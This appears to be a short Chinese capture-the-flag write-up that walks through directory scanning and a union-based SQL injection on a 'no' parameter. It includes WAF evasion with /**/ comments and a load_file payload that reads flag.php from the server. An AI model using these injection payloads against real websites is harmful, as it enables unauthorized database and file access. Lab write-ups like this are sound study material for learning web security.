1.题干
dirb一下,发现robots.txt和flag.php和/css和/js
打开flag.php啥都没有:
打开后注册,找到疑似SQL注入漏洞
PayLoad:?no=1%20order%20by%201#
order by 查询列数据。
尝试联合查询,被WAF捕捉。
用 /**/过滤:PayLoad:?no=1%20union/**/select#
进入无聊的联合查询:
联合查询:
发现2存在注入点
查找数据库和数据表
Payload:?no=2 union++select 1,database(),3,4# & ?no=2 union++select 1,user(),3,4#
发现是root权限(happy)
且注意到路径(/var/www/html/view.php)
查出flag.php
Payload:?no=2%20union/**/select%201,load_file("/var/www/html/flag.php"),3,4#
找到flag.
提交: